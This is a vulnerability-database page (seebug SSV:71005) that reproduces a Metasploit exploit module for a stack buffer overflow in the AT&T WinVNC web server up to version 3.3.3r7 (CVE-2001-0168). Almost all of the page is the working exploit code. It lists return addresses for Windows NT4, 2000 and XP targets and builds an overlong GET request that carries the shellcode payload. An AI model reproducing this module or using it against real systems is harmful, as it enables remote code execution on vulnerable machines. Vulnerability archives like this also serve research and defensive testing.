Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:71005
HistoryJul 01, 2014 - 12:00 a.m.

WinVNC Web Server <= 3.3.3r7 - GET Overflow

2014-07-0100:00:00
Root
www.seebug.org
8
JSON

No description provided by source.


                                                ##
# $Id: winvnc_http_get.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;


	class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;		=&#62; &#39;WinVNC Web Server &#60;= v3.3.3r7 GET Overflow&#39;,
			&#39;Description&#39;	=&#62; %q{
				This module exploits a buffer overflow in the AT&T WinVNC version
				&#60;= v3.3.3r7 web server. When debugging mode with logging is
				enabled (non-default), an overly long GET request can overwrite
				the stack. This exploit does not work well with VNC payloads!
			},
			&#39;Author&#39; 	=&#62; &#39;patrick&#39;,
			&#39;License&#39;       =&#62; MSF_LICENSE,
			&#39;Version&#39;       =&#62; &#39;$Revision: 7724 $&#39;,
			&#39;References&#39;    =&#62;
			[
				[ &#39;BID&#39;, &#39;2306&#39; ],
				[ &#39;OSVDB&#39;, &#39;6280&#39; ],
				[ &#39;CVE&#39;, &#39;2001-0168&#39; ],
			],
			&#39;Privileged&#39;		=&#62; true,
			&#39;DefaultOptions&#39;	=&#62;
			{
				&#39;EXITFUNC&#39;	=&#62; &#39;thread&#39;,
			},
			&#39;Payload&#39;		=&#62;
				{
					&#39;Space&#39;			=&#62; 979,
					&#39;BadChars&#39; 		=&#62; &#34;\x00\x09\x0a\x0b\x0c\x0d\x20\x0b&#34;,
					&#39;StackAdjustment&#39; 	=&#62; -3500,
				},
			&#39;Platform&#39; =&#62; [&#39;win&#39;],
			&#39;Targets&#39;  =&#62;
			[
				[ &#39;Windows NT4 SP3-6&#39;, 	{ &#39;Ret&#39; =&#62; 0x779f4e39 } ], # push esp, ret msvcrt.dll
				[ &#39;Windows 2000 SP1-4&#39;, { &#39;Ret&#39; =&#62; 0x77bba3af } ], # jmp esp comctl32.dll
				[ &#39;Windows XP SP0-1&#39;, 	{ &#39;Ret&#39; =&#62; 0x71ab7bfb } ], # jmp esp ws2_32.dll
			],
			&#39;DisclosureDate&#39; =&#62; &#39;Jan 29 2001&#39;,
			&#39;DefaultTarget&#39; =&#62; 1))

			register_options(
			[
				Opt::RPORT(5800),
			],self.class)
	end

	def exploit

		sploit = &#39;/&#39; + payload.encoded + [target[&#39;Ret&#39;]].pack(&#39;V&#39;)
		sploit &#60;&#60; make_nops(8) + Rex::Arch::X86.jmp(0xfffffc1c)

		res = send_request_raw({
			&#39;uri&#39;          =&#62; sploit,
			&#39;method&#39;       =&#62; &#39;GET&#39;,
		}, 5)

		handler

	end

end
JSON